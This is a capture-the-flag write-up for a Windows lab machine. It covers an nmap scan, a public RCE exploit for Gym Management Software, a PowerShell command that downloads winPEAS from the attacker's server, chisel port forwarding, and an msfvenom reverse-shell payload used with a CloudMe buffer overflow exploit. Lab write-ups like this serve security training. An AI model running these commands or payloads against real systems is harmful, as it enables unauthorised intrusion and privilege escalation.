Introduction

This is the second active machine that I am trying to solve.

The introduction suggests that this machine is based on a CVE. Let’s dive in and get root! BOOM BOOM!

Scanning & Enumeration

nmap -sV -A -oA nmap/buff 10.10.10.198

We see only port 8080 with HTTP. Let’s start our enumeration.

HTTP Enumeration

Landing Page

It looks like some gym stuff out there, we keep exploring around, and finally on the contact page we find,

Highlights usage of Gym Management Software

This looks like a particular template out there named ‘Gym Management Software 1.0’, a quick look and wow we have an exploit db entry for it.

Vulnerability Analysis

Exploit Database Entry for Gym Management System

This is unauthenticated remote code execution, exactly what we would want, right!

Exploitation

Let’s download the exploit, look at the source code, and try to get RC on the target.

Exploit Details

We find some exploit details in the exploit, We download the exploit and run it, and we get our initial foothold!

Privesc

Once we have our initial foothold, let us go ahead and transfer some useful binaries on to the target.

Let’s run winPEAS on the target, we can send it by starting a simple HTTP server in the root directory where we have our winPEAS.exe.

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.18:8000/winPEAS.exe', 'C:\xampp\htdocs\gym\upload\winPEAS.exe')"

We know the drill anything that looks red or is highlighted by yellow is game!

Local Ports

Well, 3306 is usually MySQL, but this 8888 looks a little fishy, well, let’s keep going.

We see a lot of links here

We see a lot of links here

CloudMe_1112.exe file found in Downloads folder

Inside downloads, we see this file.

Exploit Database entry for CloudMe

And this is vulnerable as well. Hmm, so this was the service that was running on 8888.

Exploit Code Snippet

Let’s generate a shellcode, and fire up this bitch!

We see that we do not have python on the remote machine, so we need port forwarding. For this we can use chisel!

https://github.com/jpillora/chisel/releases/tag/v1.7.0-rc9

This is where we can download different packages.

Once that is done, let’s port forward!

./chisel server -p 8080 -reverse

Port-Forwarding Successful

Thus we have successfully port forwarded the service running on the target machine on our local.

Now we can generate the shellcode, and replace in the exploit.

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=1337 -f python

One major issue is that it generates the payload in a variable called buf, so we would need to replace that with the variable ‘payload’ (as per the script)

I use vim for that,

:%s\buf\payload\g

Once we have finished all these steps, setup and netcat listener, and fire up the exploit, and BOOM BOOM. We have an admin shell!

Shell with Root Privileges

Summary | TL;DR

1. Scan ports using nmap
2. Identify vulnerable CMS, exploit to get a local foothold.
3. Find another vulnerable service called `CloudMe 1.11.2`, port forward and run the exploit.
4. BOOOM!

Parting Thoughts

In this machine, we learned the following:

1. The most important learning point for me was the port forwarding aspect, I have encountered ssh port forwarding before, but over TCP? That’s crazy!

Thank you for reading, please provide your feedback and share with people who are in need. :)